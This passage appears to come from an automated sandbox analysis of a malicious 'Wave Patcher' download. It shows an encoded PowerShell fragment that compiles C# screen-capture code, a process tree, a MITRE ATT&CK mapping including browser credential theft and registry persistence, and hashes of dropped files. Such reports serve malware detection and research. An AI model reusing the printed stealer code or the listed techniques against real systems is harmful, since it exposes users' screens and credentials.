ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
  2⤵
  PID:3536
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gosw5ca4\gosw5ca4.cmdline"
    3⤵
    PID:4504
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3629.tmp" "c:\Users\Admin\AppData\Local\Temp\gosw5ca4\CSC8EFDAFC34395444BA98E25CAD7262DF9.TMP"
      4⤵
      PID:1988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\57ea2145-5cb2-4cbc-a8d9-a1010fea36f0.tmp

Filesize
10KB

MD5
a0825be748bd02ea9763897d54d44c51

SHA1
fecab029f931676e449f07bb9e107cfee5764e16

SHA256
b5ff4e5160b86fc3fff67edba5faaa2ca17b403d01d197097d3a0e2e3cc4b981

SHA512
39e991163faaec625e3588e932c8452b36936dc5a8830d83924b6b10b82bc72ce9b07b2c9835ce7a205d6e5a90c24d258b968fd894bd32ce7ac5ee9bf637c7b2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
04b60a51907d399f3685e03094b603cb

SHA1
228d18888782f4e66ca207c1a073560e0a4cc6e7

SHA256
87a9d9f1bd99313295b2ce703580b9d37c3a68b9b33026fdda4c2530f562e6a3

SHA512
2a8e3da94eaf0a6c4a2f29da6fec2796ba6a13cad6425bb650349a60eb3204643fc2fd1ab425f0251610cb9cce65e7dba459388b4e00c12ba3434a1798855c91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
9622e603d436ca747f3a4407a6ca952e

SHA1
297d9aed5337a8a7290ea436b61458c372b1d497

SHA256
ace0e47e358fba0831b508cd23949a503ae0e6a5c857859e720d1b6479ff2261

SHA512
f774c5c44f0fcdfb45847626f6808076dccabfbcb8a37d00329ec792e2901dc59636ef15c95d84d0080272571542d43b473ce11c2209ac251bee13bd611b200a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
744B

MD5
f06155b76ee2b7fb45ad86dfbe3b888d

SHA1
5cb7165114e714955505967d1f67a2688886a8ce

SHA256
abe4c32e9314cf4e13f71d2873adb38bcf96ebe9efb4faace8bfaf376c8867ec

SHA512
01e010496e41f2bdca61b2db7126cd68b7e80af0ddd1d8ed21dadd7d55eb1b97ebeed7fac5e8b008a99d440dd80cda8d988c18e3ef3f9892e4ff46c8b736b913

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
2034521d0cd05458143e478e9c46d517

SHA1
68f2ccd3b77ff53168682db0b779ef206b9af3fb

SHA256
acf23ab2b217b63c756733dabb98cc695f885c754793d4b59ba01f9ef73cc448

SHA512
e6b7947d63f6fcc7e8b3f0459818b173ccc9c9ba3a0a21f8ee40d84d765a2a190ab98980436c1bc8ba84f78cebef07296b52fbb4492512f246ffd8bfa5c62061

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
748B

MD5
6317d6359252cf4a434f3ceb3488aa9b

SHA1
109ed3fe45e989474b883f11c4fac256b0c80cad

SHA256
a2f85801876b3235a47c8bed5acfef36da06e258e4b9c82b06810eccdf37e583

SHA512
9078067f7b417b95409feb9ab1088c1ff6e22a5963de5463b7863853999a91aa4642ad140a3d6594b75fa3d1d5b72df71ec3d07c2bed09318b0ef636c8255db4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
4KB

MD5
adb8ac08e031dc67b7af678fa75b9955

SHA1
1ca7537fef72cf4f772b5288720edbad4fdb1543

SHA256
8ce8d0a915026a9a17f9d24ccf14b86766d82ad3e3826d720a2698790dd000d7

SHA512
6e24f72e28fd808e09130764580c46f8bf7325085dde0b1d3d8e3fc5bc24259ee366bcd4e597fe24ca8ec667fbc4c87effac0943f67e65d5b280b1c657fbaad6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
9466b44f2de1ba06383f5bf1dd54b0fb

SHA1
73bdd12300caefb3461c828f75754a80ce4d3214

SHA256
b6fe961974c8425988ddff0534d4e2f5bba1b2b5f0faf2ba9c0be2cb6c49614a

SHA512
635bf7ee72e16c780dc69097352f58894581730aa98bf363d29d85c2a5d71aea5f470803d2ecae1d6df3428e560e0c2b8ee79b72112296bbbfe4a48f95d38054

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
9c8a149d5c6f035f441ad6d648516707

SHA1
a9878160083aeb39fd6656e38b8c8f34ee16174b

SHA256
75bbcc6561fd923aa50a41236d106bc1685bd0bb8214d1bbbb6878729cc76e08

SHA512
93e7728c3c1f2b84a75b9e05a4cfbee3097627faa735005cbcc28efc2d48f37e0e27a714913c13a93fce18c3bebd9831780a251be57b6b3520b1f2f2977fa877

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
0a6e7707bed776a0efca965f862bbfee

SHA1
21ab702381cca362b5d37580fadf81696f777bb0

SHA256
cd8acb120b3c2e904f672e81c7de83afa867200b79203b777808c16ad95964e3

SHA512
9b12c10cc5b58ac8132eadc1af56c6c656ec968462a7957d1d2c55a6349f0fbabf32082c7e8ea1379753537c00e09ed59094e2602211c86932571606a29d2f94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
ae9cf37699d5b5cec1a4eac34926a4d4

SHA1
41036b74234a6d66be662a148cd9e82cba29e149

SHA256
349be63d0cf9d941f584cca4d2f2a8325d74a799e63471abdd51c8b9f7399a47

SHA512
eab4ba50fb5ba370392c30a5c7c58589730e3172dc1d9090130cde2a0446243d62c930d96ae43e8f3e9819aba07125d59fa99d6170ca1acfba03fc06cef45bb0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
0a72bc98dcd2ee5a027e2d0f7b550bb3

SHA1
bf6d422cc580d0d3d8b8f3409c850abe3311120c

SHA256
786b2fc58b7289fc72fc467e4019d463fa4378dd25f174f6e27443de61ae9a89

SHA512
34af1af26afeef19da9e676b47983501dfd2809bad5f17da7f1565534ca7a02c708fe5ddd34e425ccbd6f967fa23d27f4ce6c64a6c1c2927f23e31ea784a0120

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
67e8893616f805af2411e2f4a1411b2a

SHA1
39bf1e1a0ddf46ce7c136972120f512d92827dcd

SHA256
ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31

SHA512
164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3629.tmp

Filesize
1KB

MD5
bd327af902605a30d23bb8cfc4956fa2

SHA1
55a14b8139716673aa50eb47aec0908309e6dc82

SHA256
3ce7d03366112d537dbf31dcd475b229c7376567aad73146c5228c1c340b1278

SHA512
cdbc936dd976871f7b56065b75a8ea7995d0ae27361481cdad2037217ff37c3914ba0642b2622b629ece3dc0145470adf13df7adfa2ee51c28ba435753679dc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\X5V3Q2TZs7\Display (1).png

Filesize
259KB

MD5
c50ae4826126a0e7045e82ed25f5612a

SHA1
99b0670e3a77f9e25df470ade2a5308de9d956e2

SHA256
88617c6349204e52055b591b907c38d8c3777b6f7a09874ad3e0aba8698f3b55

SHA512
aa5c211a8e2fd4519b17449e927e843c8bd675898f9eaa0d099553e509b6528be536c60612725961a62e82eb8d108d5508c197754fce26dc6ef286ceb7445a15

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zchxdoqo.dvq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\gosw5ca4\gosw5ca4.dll

Filesize
4KB

MD5
83f7ac622d437ff55afdb341006e6655

SHA1
08d8422157844c4628491a629d4901b4243a53f9

SHA256
086147d353088d38f58d5368bebe76dd5018f280a5532d0558986a1be2bb550b

SHA512
41d573cd9bad5798671294c5289d3b9bc965fc50cf963127605e4cfea9610349c9a5766ca1e639c1030dbfb16ec99200936609f6b7f1a513bcaa0e811f295ee0

Download Submit
C:\Users\Admin\Downloads\Wave Patcher.rar

Filesize
7.5MB

MD5
21506d74ea85e069149fb91841b208a9

SHA1
aec0fb6fb1da151852af525e86016809592e84df

SHA256
3612f91929b87d68b5059d930dd5fee68461c743577c70b2cb501f4016b4aa8c

SHA512
2ce98f5c47ee544027a58e6821a0af822a053ea0d5295722f82b82e991c781ca7cc9999837fb7955e873b048a29983acf4a783ca9c250971b1bc0baeb8287641

Download Submit
C:\Users\Admin\Downloads\Wave Patcher\Wave Patcher.exe

Filesize
14.2MB

MD5
67a0a960f47058f0b38ea5d9fceb7ecf

SHA1
c200a22c4d1639e8a5803d435e45a8ab94331a49

SHA256
aea122a1e7b8965189f58fdfd773edc9d245b3ebd87f68750e71cdae665cb679

SHA512
d7ecd2d0bea1060bfb60d3b1b98959f8ff8d40224cfa5e224b460a6d0712d870439e0a753fce6600e0652606e817aa51ddd75c592a2cdda810e0cb4808b60f24

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
6e2386469072b80f18d5722d07afdc0b

SHA1
032d13e364833d7276fcab8a5b2759e79182880f

SHA256
ade1813ae70d7da0bfe63d61af8a4927ed12a0f237b79ce1ac3401c0646f6075

SHA512
e6b96f303935f2bbc76f6723660b757d7f3001e1b13575639fb62d68a734b4ce8c833b991b2d39db3431611dc2cacde879da1aecb556b23c0d78f5ee67967acb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gosw5ca4\CSC8EFDAFC34395444BA98E25CAD7262DF9.TMP

Filesize
652B

MD5
9aeeb9e9f37057cdb9a817fada2366f8

SHA1
58c67a677679f84d387221fea1564efb42040a63

SHA256
d4370b15d9dd5936d2bdd7429e9bec0aac87e434a258aab4273e1b2b4304811b

SHA512
3089bf01e75e981eee40863c5c6314d2a10997d0e352aec8734fcc37a096f0d775c93186f731a55f591937afe021b7f95e61066a5fbbc96e634788101b5ded8b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gosw5ca4\gosw5ca4.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gosw5ca4\gosw5ca4.cmdline

Filesize
607B

MD5
fa11b566e1278a7d6f1dcd9cfea779ac

SHA1
f9e2ca4919bee8905c5a5b9d0e175433992b0283

SHA256
e573f9c1a5a79dd74cb3dc1a374085591f5b67baaf311db996829b6e3692263f

SHA512
9ced3cf86859fb017bf9dc0d55e184fa9745251746f3d485effc598a36030aaba7526a93f768e983866a7b3e5a4991d82b6a341d32a555ca60fcbe676d8a2d8e

Download Submit
memory/3536-336-0x00000281E2E60000-0x00000281E2E68000-memory.dmp

Filesize
32KB

Download
memory/3776-284-0x00000154B62C0000-0x00000154B62E2000-memory.dmp

Filesize
136KB

Download
memory/3860-311-0x000002E67B880000-0x000002E67B8C8000-memory.dmp

Filesize
288KB

Download